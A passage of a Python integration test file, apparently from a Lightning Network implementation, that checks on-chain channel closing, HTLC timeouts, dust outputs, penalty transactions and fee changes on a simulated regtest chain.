'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the last two txes can be broadcast.
# These should donate the total amount to miners.
rbf_txes = rbf_txes[-2:]
for tx in rbf_txes:
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# l2 donated it to the miners, so it owns nothing
assert len(l2.rpc.listfunds()['outputs']) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where opener immediately drops to chain"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
# Make locktime different, as we once had them reversed!
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'plugin': coin_mvt_plugin},
{'watchtime-blocks': 10,
'plugin': coin_mvt_plugin}],
fundchannel=False)
l1.fundwallet(10**7)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
channel_id = first_channel_id(l1, l2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'watchtime-blocks': 201, 'cltv-delta': 101,
'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500)},
{'watchtime-blocks': 201, 'cltv-delta': 101}])
inv = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1, wait_for_mempool=1)
# Wait for nodes to notice the failure; this search needle is after the
# DB commit so we're sure the tx entries in channeltxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Must be dust!
inv = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=1)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=2)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(TIMEOUT)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin,
'disconnect': disconnects},
{}])
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_their_unilateral_in(node_factory, bitcoind):
""" This is the same as test_onchain_middleman, except that
node l1 drops to chain, not l2, reversing the unilateral
handling logic """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1_disconnects = ['=WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l2_disconnects = ['-WIRE_UPDATE_FULFILL_HTLC']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin,
'disconnect': l1_disconnects},
{'plugin': coin_mvt_plugin,
'disconnect': l2_disconnects},
{}])
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
c12, _ = l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Make sure l3 sees gossip for channel now; it can get upset
# and give bad gossip msg if channel is closed before it sees
# node announcement.
wait_for(lambda: l3.rpc.listchannels(c12)['channels'] != [])
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l1 will drop to chain.
l1.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('THEIR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, immediately
l2.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
l1.bitcoin.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l1 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_their_unilateral_out(node_factory, bitcoind):
""" Very similar to the test_onchain_middleman, except there's no
middleman, we simply want to check that our offered htlc
on their unilateral returns to us (and is accounted
for correctly) """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin},
{'disconnect': disconnects,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
route = l1.rpc.getroute(l2.info['id'], 10**8, 1)["route"]
assert len(route) == 1
q = queue.Queue()
def try_pay():
try:
# rhash is fake (so is payment_secret)
rhash = 'B1' * 32
l1.rpc.sendpay(route, rhash, payment_secret=rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l2.daemon.wait_for_log('sendrawtx exit 0')
l2.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC')
# l1 should wait for the HTLC's cltv expiry (10 blocks here), then time it out onchain
l2.bitcoin.generate_block(9)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
l2.daemon.wait_for_log('Ignoring output .*_UNILATERAL/THEIR_HTLC')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# 100 blocks after last spend, l1+l2 should be done.
l2.bitcoin.generate_block(100)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l2, channel_id) == 0
assert account_balance(l1, channel_id) == 0
def test_listfunds_after_their_unilateral(node_factory, bitcoind):
"""We keep spending info around for their unilateral closes.
Make sure we show the address.
"""
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# FIXME: We can get warnings from unilateral closes, since we treat
# such errors as soft because of LND.
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin,
"allow_warning": True},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# listfunds will show 1 output change, and channels.
assert len([o for o in l1.rpc.listfunds()['outputs'] if not o['reserved']]) == 1
l1.stop()
l2.rpc.close(l1.info['id'], unilateraltimeout=1)
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(100)
l1.start()
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == 2)
assert all(['address' in o for o in l1.rpc.listfunds()['outputs']])
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[
{
'may_reconnect': True,
'allow_warning': True,
}, {
'may_reconnect': True,
'disconnect': disconnects,
}
])
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# Despite the changed feerates, we still recognize the proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@pytest.mark.developer("needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None,
'plugin': coin_mvt_plugin},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects, options={'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for unilateral_close set to [56789][0-9]{4}')
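# At this feerate the HTLC output would cost more to claim than it is
# worth, so onchaind should propose IGNORING_TINY_PAYMENT rather than
# trying to reclaim it.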
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l2.daemon.wait_for_log('htlc 0: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 11000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l2.daemon.wait_for_log('htlc 1: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l2.daemon.wait_for_log('htlc 2: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
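# (The min/max range exists because the published commitment could have
# been built at any feerate seen in between; onchaind uses it when
# working out that commitment's possible fees.)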
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
